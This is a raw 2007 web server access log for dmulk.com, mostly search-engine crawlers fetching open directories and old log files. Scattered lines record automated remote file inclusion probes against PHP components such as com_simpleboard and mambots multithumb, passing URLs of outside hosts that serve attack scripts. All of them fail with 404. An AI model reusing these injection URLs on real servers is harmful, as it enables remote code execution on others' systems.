74.6.19.76 - - [21/Dec/2007:15:17:07 -0800] "GET /tmp/sess_9f6d78e2e19481d4d4a17afa8ef734ed HTTP/1.0" 403 163 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.249.73.36 - - [21/Dec/2007:15:20:57 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.73.36 - - [21/Dec/2007:15:20:57 -0800] "GET /logs/access_070904.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.73.36 - - [21/Dec/2007:15:21:55 -0800] "GET /logs/access_071013.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.73.36 - - [21/Dec/2007:15:21:56 -0800] "GET /logs/access_070909.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.73.36 - - [21/Dec/2007:15:23:10 -0800] "GET /logs/access_071031.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.73.36 - - [21/Dec/2007:15:23:39 -0800] "GET /mobileoffice/ HTTP/1.1" 200 5024 "-" "Nokia6820/2.0 (4.83) Profile/MIDP-1.0 Configuration/CLDC-1.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.73.36 - - [21/Dec/2007:15:25:04 -0800] "GET /logs/access_070822.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.73.36 - - [21/Dec/2007:15:27:57 -0800] "GET /robots.txt HTTP/1.1" 403 163 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "dmulk.com"
66.249.73.36 - - [21/Dec/2007:15:27:57 -0800] "GET /logs/access_070707.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "dmulk.com"
66.249.73.36 - - [21/Dec/2007:15:28:24 -0800] "GET /logs/access_070929.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.73.36 - - [21/Dec/2007:15:28:30 -0800] "GET /logs/access_070916.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.73.36 - - [21/Dec/2007:15:33:00 -0800] "GET /logs/access_070809.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.73.36 - - [21/Dec/2007:15:34:20 -0800] "GET /logs/access_071113.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.73.36 - - [21/Dec/2007:15:35:01 -0800] "GET /logs/access_071029.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.73.36 - - [21/Dec/2007:15:35:04 -0800] "GET /logs/access_071028.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.73.36 - - [21/Dec/2007:15:38:42 -0800] "GET /logs/access_070920.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.73.36 - - [21/Dec/2007:15:38:42 -0800] "GET /logs/access_071008.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.73.36 - - [21/Dec/2007:15:38:43 -0800] "GET /logs/access_071011.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
216.117.166.233 - - [21/Dec/2007:15:56:11 -0800] "GET /smarty.php?xcart_dir=http://www.business-technology-associates.com/offl//lib/test.txt??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
216.117.166.233 - - [21/Dec/2007:15:56:13 -0800] "GET /logs/smarty.php?xcart_dir=http://www.business-technology-associates.com/offl//lib/test.txt??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
74.6.26.166 - - [21/Dec/2007:15:58:29 -0800] "GET /logs/access_070910.log HTTP/1.0" 200 50863 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.26.166 - - [21/Dec/2007:15:59:30 -0800] "GET /logs/?M=A HTTP/1.0" 200 26662 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.42.88.212 - - [21/Dec/2007:16:01:11 -0800] "GET /thickbox/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://bagolster.com/tool/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.25.135 - - [21/Dec/2007:16:02:42 -0800] "GET /presto/?D=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.249.73.36 - - [21/Dec/2007:16:12:22 -0800] "GET /logs/access_070726.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.73.36 - - [21/Dec/2007:16:12:22 -0800] "GET /logs/access_070919.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
69.42.88.212 - - [21/Dec/2007:16:14:51 -0800] "GET /logs/access_071110.log/thickbox/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://bagolster.com/tool/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.42.88.212 - - [21/Dec/2007:16:14:51 -0800] "GET /logs/thickbox/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://bagolster.com/tool/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.27.101 - - [21/Dec/2007:16:21:06 -0800] "GET /retreat1/?S=A HTTP/1.0" 200 15065 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
68.142.212.185 - - [21/Dec/2007:17:04:36 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [21/Dec/2007:17:05:01 -0800] "GET /minamijewelry/html/images/wind_character.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
75.125.52.146 - - [21/Dec/2007:17:34:25 -0800] "GET / HTTP/1.1" 200 2962 "-" "Mozilla/5.0 (compatible; Gigamega.bot/1.0; +http://www.gigamega.net/bot.html)" "dmulk.com"
75.125.52.146 - - [21/Dec/2007:17:34:25 -0800] "GET /?n=d HTTP/1.1" 200 2962 "-" "Mozilla/5.0 (compatible; Gigamega.bot/1.0; +http://www.gigamega.net/bot.html)" "dmulk.com"
75.125.52.146 - - [21/Dec/2007:17:34:25 -0800] "GET /?m=a HTTP/1.1" 200 2962 "-" "Mozilla/5.0 (compatible; Gigamega.bot/1.0; +http://www.gigamega.net/bot.html)" "dmulk.com"
75.125.52.146 - - [21/Dec/2007:17:34:26 -0800] "GET /?s=a HTTP/1.1" 200 2962 "-" "Mozilla/5.0 (compatible; Gigamega.bot/1.0; +http://www.gigamega.net/bot.html)" "dmulk.com"
75.125.52.146 - - [21/Dec/2007:17:34:26 -0800] "GET /?d=a HTTP/1.1" 200 2962 "-" "Mozilla/5.0 (compatible; Gigamega.bot/1.0; +http://www.gigamega.net/bot.html)" "dmulk.com"
75.125.52.146 - - [21/Dec/2007:17:34:26 -0800] "GET / HTTP/1.1" 200 2962 "-" "Mozilla/5.0 (compatible; Gigamega.bot/1.0; +http://www.gigamega.net/bot.html)" "dmulk.com"
75.125.52.146 - - [21/Dec/2007:17:34:27 -0800] "GET /_private/ HTTP/1.1" 403 163 "-" "Mozilla/5.0 (compatible; Gigamega.bot/1.0; +http://www.gigamega.net/bot.html)" "dmulk.com"
75.125.52.146 - - [21/Dec/2007:17:34:27 -0800] "GET /backup/ HTTP/1.1" 401 395 "-" "Mozilla/5.0 (compatible; Gigamega.bot/1.0; +http://www.gigamega.net/bot.html)" "dmulk.com"
75.125.52.146 - - [21/Dec/2007:17:34:27 -0800] "GET /backup2/ HTTP/1.1" 401 395 "-" "Mozilla/5.0 (compatible; Gigamega.bot/1.0; +http://www.gigamega.net/bot.html)" "dmulk.com"
75.125.52.146 - - [21/Dec/2007:17:34:27 -0800] "GET /bikes/ HTTP/1.1" 200 2052 "-" "Mozilla/5.0 (compatible; Gigamega.bot/1.0; +http://www.gigamega.net/bot.html)" "dmulk.com"
75.125.52.146 - - [21/Dec/2007:17:34:28 -0800] "GET /drop/ HTTP/1.1" 401 395 "-" "Mozilla/5.0 (compatible; Gigamega.bot/1.0; +http://www.gigamega.net/bot.html)" "dmulk.com"
75.125.52.146 - - [21/Dec/2007:17:34:28 -0800] "GET /funny/ HTTP/1.1" 200 812 "-" "Mozilla/5.0 (compatible; Gigamega.bot/1.0; +http://www.gigamega.net/bot.html)" "dmulk.com"
75.125.52.146 - - [21/Dec/2007:17:34:28 -0800] "GET /imperant/ HTTP/1.1" 401 395 "-" "Mozilla/5.0 (compatible; Gigamega.bot/1.0; +http://www.gigamega.net/bot.html)" "dmulk.com"
75.125.52.146 - - [21/Dec/2007:17:34:28 -0800] "GET /logs/ HTTP/1.1" 200 27227 "-" "Mozilla/5.0 (compatible; Gigamega.bot/1.0; +http://www.gigamega.net/bot.html)" "dmulk.com"
75.125.52.146 - - [21/Dec/2007:17:34:29 -0800] "GET /megumi/ HTTP/1.1" 200 937 "-" "Mozilla/5.0 (compatible; Gigamega.bot/1.0; +http://www.gigamega.net/bot.html)" "dmulk.com"
75.125.52.146 - - [21/Dec/2007:17:34:29 -0800] "GET /minamijewelry/ HTTP/1.1" 200 2116 "-" "Mozilla/5.0 (compatible; Gigamega.bot/1.0; +http://www.gigamega.net/bot.html)" "dmulk.com"
75.125.52.146 - - [21/Dec/2007:17:34:30 -0800] "GET /mobilehackers/ HTTP/1.1" 401 395 "-" "Mozilla/5.0 (compatible; Gigamega.bot/1.0; +http://www.gigamega.net/bot.html)" "dmulk.com"
75.125.52.146 - - [21/Dec/2007:17:34:30 -0800] "GET /mobileoffice/ HTTP/1.1" 200 5024 "-" "Mozilla/5.0 (compatible; Gigamega.bot/1.0; +http://www.gigamega.net/bot.html)" "dmulk.com"
75.125.52.146 - - [21/Dec/2007:17:34:30 -0800] "GET /plans/ HTTP/1.1" 200 974 "-" "Mozilla/5.0 (compatible; Gigamega.bot/1.0; +http://www.gigamega.net/bot.html)" "dmulk.com"
75.125.52.146 - - [21/Dec/2007:17:34:31 -0800] "GET /presto/ HTTP/1.1" 200 526 "-" "Mozilla/5.0 (compatible; Gigamega.bot/1.0; +http://www.gigamega.net/bot.html)" "dmulk.com"
75.125.52.146 - - [21/Dec/2007:17:34:31 -0800] "GET /retreat1/ HTTP/1.1" 200 15081 "-" "Mozilla/5.0 (compatible; Gigamega.bot/1.0; +http://www.gigamega.net/bot.html)" "dmulk.com"
75.125.52.146 - - [21/Dec/2007:17:34:32 -0800] "GET /tmp/ HTTP/1.1" 200 1507 "-" "Mozilla/5.0 (compatible; Gigamega.bot/1.0; +http://www.gigamega.net/bot.html)" "dmulk.com"
75.125.52.146 - - [21/Dec/2007:17:34:35 -0800] "GET /tools/ HTTP/1.1" 200 12400 "-" "Mozilla/5.0 (compatible; Gigamega.bot/1.0; +http://www.gigamega.net/bot.html)" "dmulk.com"
75.125.52.146 - - [21/Dec/2007:17:34:36 -0800] "GET /warboard/ HTTP/1.1" 401 395 "-" "Mozilla/5.0 (compatible; Gigamega.bot/1.0; +http://www.gigamega.net/bot.html)" "dmulk.com"
75.125.52.146 - - [21/Dec/2007:17:34:36 -0800] "GET /?n=a HTTP/1.1" 200 2962 "-" "Mozilla/5.0 (compatible; Gigamega.bot/1.0; +http://www.gigamega.net/bot.html)" "dmulk.com"
75.125.52.146 - - [21/Dec/2007:17:34:36 -0800] "GET /crestoc07/ HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Gigamega.bot/1.0; +http://www.gigamega.net/bot.html)" "dmulk.com"
75.125.52.146 - - [21/Dec/2007:17:34:36 -0800] "GET /dteel/ HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Gigamega.bot/1.0; +http://www.gigamega.net/bot.html)" "dmulk.com"
75.125.52.146 - - [21/Dec/2007:17:34:37 -0800] "GET /bracelet/ HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Gigamega.bot/1.0; +http://www.gigamega.net/bot.html)" "dmulk.com"
75.125.52.146 - - [21/Dec/2007:17:34:37 -0800] "GET /necklace/ HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Gigamega.bot/1.0; +http://www.gigamega.net/bot.html)" "dmulk.com"
75.125.52.146 - - [21/Dec/2007:17:34:37 -0800] "GET /earrings/ HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Gigamega.bot/1.0; +http://www.gigamega.net/bot.html)" "dmulk.com"
75.125.52.146 - - [21/Dec/2007:17:34:39 -0800] "GET /html/ HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Gigamega.bot/1.0; +http://www.gigamega.net/bot.html)" "dmulk.com"
75.125.52.146 - - [21/Dec/2007:17:34:40 -0800] "GET /source_images/ HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Gigamega.bot/1.0; +http://www.gigamega.net/bot.html)" "dmulk.com"
75.125.52.146 - - [21/Dec/2007:17:34:40 -0800] "GET /a2_master_suite_plan.pdf HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Gigamega.bot/1.0; +http://www.gigamega.net/bot.html)" "dmulk.com"
75.125.52.146 - - [21/Dec/2007:17:34:40 -0800] "GET /a3_roof_plan.pdf HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Gigamega.bot/1.0; +http://www.gigamega.net/bot.html)" "dmulk.com"
75.125.52.146 - - [21/Dec/2007:17:34:40 -0800] "GET /a4_schemaic_section.pdf HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Gigamega.bot/1.0; +http://www.gigamega.net/bot.html)" "dmulk.com"
75.125.52.146 - - [21/Dec/2007:17:34:41 -0800] "GET /webcam/ HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Gigamega.bot/1.0; +http://www.gigamega.net/bot.html)" "dmulk.com"
75.125.52.146 - - [21/Dec/2007:17:34:41 -0800] "GET /work/ HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Gigamega.bot/1.0; +http://www.gigamega.net/bot.html)" "dmulk.com"
75.125.52.146 - - [21/Dec/2007:17:34:41 -0800] "GET /sess_3a93fd10fdc8aec6e5aff5a37f95d071 HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Gigamega.bot/1.0; +http://www.gigamega.net/bot.html)" "dmulk.com"
75.125.52.146 - - [21/Dec/2007:17:34:41 -0800] "GET /sess_52295b7fd5ebc45062bb6af6e7e069e4 HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Gigamega.bot/1.0; +http://www.gigamega.net/bot.html)" "dmulk.com"
75.125.52.146 - - [21/Dec/2007:17:34:42 -0800] "GET /sess_5411016a3b8167fd9b6c2459e7db9458 HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Gigamega.bot/1.0; +http://www.gigamega.net/bot.html)" "dmulk.com"
75.125.52.146 - - [21/Dec/2007:17:34:42 -0800] "GET /sess_9f6d78e2e19481d4d4a17afa8ef734ed HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Gigamega.bot/1.0; +http://www.gigamega.net/bot.html)" "dmulk.com"
75.125.52.146 - - [21/Dec/2007:17:34:42 -0800] "GET /sess_f6e3039f64398e069bcbb327236aa12b HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Gigamega.bot/1.0; +http://www.gigamega.net/bot.html)" "dmulk.com"
74.6.23.35 - - [21/Dec/2007:17:44:04 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.23.22 - - [21/Dec/2007:17:44:06 -0800] "GET /minamijewelry/minami_site3.psd HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
24.91.241.107 - - [21/Dec/2007:17:49:19 -0800] "GET /funny/ HTTP/1.1" 200 808 "http://www.google.com/search?q=%22Index+of%22+funny&hl=en&safe=off&client=firefox-a&rls=org.mozilla:en-US:official&hs=0Mt&start=10&sa=N" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
24.91.241.107 - - [21/Dec/2007:17:49:20 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.142.212.185 - - [21/Dec/2007:18:03:40 -0800] "GET /minamijewelry/html/images/dream_character.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
74.6.22.126 - - [21/Dec/2007:18:07:12 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.126 - - [21/Dec/2007:18:07:12 -0800] "GET /megumi/earrings/ HTTP/1.0" 200 2065 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.43 - - [21/Dec/2007:18:09:35 -0800] "GET /logs/access_071004.log HTTP/1.0" 200 70439 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
68.142.212.185 - - [21/Dec/2007:18:17:01 -0800] "GET /minamijewelry/source_images/updated1/bird.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [21/Dec/2007:18:18:03 -0800] "GET /minamijewelry/source_images/updated1/moon.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [21/Dec/2007:18:18:47 -0800] "GET /megumi/Necklace/3_Turquoise_Sterling_Silver_Set_Blue_70.JPG HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [21/Dec/2007:18:19:30 -0800] "GET /minamijewelry/source_images/updated1/dream.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [21/Dec/2007:18:20:13 -0800] "GET /minamijewelry/html/images/flower_character.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
209.216.195.2 - - [21/Dec/2007:18:39:52 -0800] "GET /logs/access_071215.log//components/com_simpleboard/image_upload.php?sbp=http://www.hobbiz.com/images/powered/_vti_cnf/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.216.195.2 - - [21/Dec/2007:18:39:52 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.hobbiz.com/images/powered/_vti_cnf/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.216.195.2 - - [21/Dec/2007:18:39:52 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.hobbiz.com/images/powered/_vti_cnf/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.55.209.206 - - [21/Dec/2007:18:56:15 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.209.206 - - [21/Dec/2007:18:56:15 -0800] "GET /presto/?N=A HTTP/1.0" 200 510 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
74.6.20.116 - - [21/Dec/2007:19:00:02 -0800] "GET /logs/access_071101.log HTTP/1.0" 200 4709 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.23 - - [21/Dec/2007:19:00:27 -0800] "GET /tmp/sess_49beda1a3d417e00236db76021cdba69 HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.26.63.26 - - [21/Dec/2007:19:10:00 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.gl0w.kit.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
64.26.63.26 - - [21/Dec/2007:19:10:00 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.gl0w.kit.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
74.6.28.79 - - [21/Dec/2007:19:13:21 -0800] "GET /presto/?S=D HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
207.44.234.6 - - [21/Dec/2007:19:14:46 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.emabe.com/administrator/templates/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
207.44.234.6 - - [21/Dec/2007:19:14:47 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.emabe.com/administrator/templates/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
74.6.22.126 - - [21/Dec/2007:19:15:00 -0800] "GET /megumi/Bracelet/ HTTP/1.0" 200 1689 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.19.200 - - [21/Dec/2007:19:15:10 -0800] "GET / HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
207.44.234.6 - - [21/Dec/2007:19:16:47 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.emabe.com/administrator/templates/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
207.44.234.6 - - [21/Dec/2007:19:16:51 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.emabe.com/administrator/templates/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
74.6.26.19 - - [21/Dec/2007:19:17:06 -0800] "GET /?M=A HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.126 - - [21/Dec/2007:19:30:54 -0800] "GET /plans/?M=A HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.24.10 - - [21/Dec/2007:19:31:14 -0800] "GET /minamijewelry/ HTTP/1.0" 200 2100 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
207.44.234.6 - - [21/Dec/2007:19:42:59 -0800] "GET /logs//SQuery3/lib/gore.php?libpath=http://www.emabe.com/administrator/templates/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
207.44.234.6 - - [21/Dec/2007:19:43:01 -0800] "GET //SQuery3/lib/gore.php?libpath=http://www.emabe.com/administrator/templates/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
207.44.234.6 - - [21/Dec/2007:19:46:19 -0800] "GET /logs//SQuery3/lib/gore.php?libpath=http://www.emabe.com/administrator/templates/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
207.44.234.6 - - [21/Dec/2007:19:46:19 -0800] "GET //SQuery3/lib/gore.php?libpath=http://www.emabe.com/administrator/templates/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
74.52.27.194 - - [21/Dec/2007:19:55:32 -0800] "GET /index.php?option=com_color&Itemid=&mosConfig_absolute_path=http://www.cdmastercopy.com/duplication/cache/31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
90.26.195.234 - - [21/Dec/2007:20:00:09 -0800] "GET /funny/ HTTP/1.1" 200 812 "http://www.google.fr/search?as_q=&hl=fr&num=100&btnG=Recherche+Google&as_epq=index+of+funny&as_oq=&as_eq=&lr=&cr=&as_ft=i&as_filetype=&as_qdr=all&as_occt=any&as_dt=i&as_sitesearch=&as_rights=&safe=images" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Wanadoo 6.7; .NET CLR 1.1.4322)" "www.dmulk.com"
90.26.195.234 - - [21/Dec/2007:20:00:10 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Wanadoo 6.7; .NET CLR 1.1.4322)" "www.dmulk.com"
90.26.195.234 - - [21/Dec/2007:20:00:16 -0800] "GET / HTTP/1.1" 200 2962 "http://www.dmulk.com/funny/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Wanadoo 6.7; .NET CLR 1.1.4322)" "www.dmulk.com"
66.249.73.36 - - [21/Dec/2007:20:05:36 -0800] "GET /presto/ HTTP/1.1" 200 526 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
12.180.249.3 - - [21/Dec/2007:20:18:29 -0800] "GET /logs/access_071122.log//components/com_simpleboard/image_upload.php?sbp=http://mail.tu-varna.acad.bg/bitch.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
12.180.249.3 - - [21/Dec/2007:20:18:29 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://mail.tu-varna.acad.bg/bitch.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
12.180.249.3 - - [21/Dec/2007:20:18:30 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://mail.tu-varna.acad.bg/bitch.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.93.57.34 - - [21/Dec/2007:20:19:15 -0800] "GET /logs/access_071122.log//components/com_simpleboard/image_upload.php?sbp=http://mail.tu-varna.acad.bg/bitch.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.57.34 - - [21/Dec/2007:20:19:16 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://mail.tu-varna.acad.bg/bitch.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.57.34 - - [21/Dec/2007:20:19:16 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://mail.tu-varna.acad.bg/bitch.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
